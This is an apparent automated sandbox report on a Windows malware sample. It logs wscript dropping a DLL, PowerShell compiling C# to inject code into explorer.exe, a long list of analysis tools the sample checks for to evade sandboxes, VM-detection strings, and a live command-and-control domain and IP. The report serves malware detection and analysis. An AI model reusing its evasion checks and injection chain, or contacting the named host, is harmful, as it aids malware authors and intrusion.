Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000001.00000003.572498942.0000017634237000.00000004.00000001.sdmp Binary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 3256 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2968 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6236 Jump to behavior
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.dll Jump to dropped file
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05591802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 21_2_05591802
Source: mshta.exe, 0000001E.00000003.636430270.0000014A8EE78000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\-
Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.695253340.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}85-ab02-99bb52d3fb8b}\InstaB^
Source: explorer.exe, 00000025.00000000.714478354.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmp Binary or memory string: 0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BU
Source: RuntimeBroker.exe, 00000027.00000000.747653122.000002413A440000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 00000015.00000003.621150182.00000000008E3000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}-0E2F-4A16-A381-3E560C68BC8B
Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bc
Source: explorer.exe, 00000025.00000000.712725595.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000025.00000000.715825967.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: rundll32.exe, 00000015.00000003.621150182.00000000008E3000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW,
Source: explorer.exe, 00000025.00000000.729862046.00000000053D7000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000025.00000000.715825967.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: mshta.exe, 0000001E.00000003.636522646.0000014A8EE47000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05581577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 21_2_05581577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055714A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 21_2_055714A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05586E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 21_2_05586E4E

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05585529 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 21_2_05585529
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05592A09 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 21_2_05592A09

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80 Jump to behavior
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: fum.cpp.1.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.0.cs Jump to dropped file
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: 160000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 195D87A0000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580 Jump to behavior
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 9B851580
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF64DBB12E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 160000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF64DBB12E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: ED6000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2AD0000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580 Jump to behavior
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 46DA8FD000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF616D15FD0
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 195D87A0000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF616D15FD0
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Injects code into the Windows Explorer (explorer.exe)
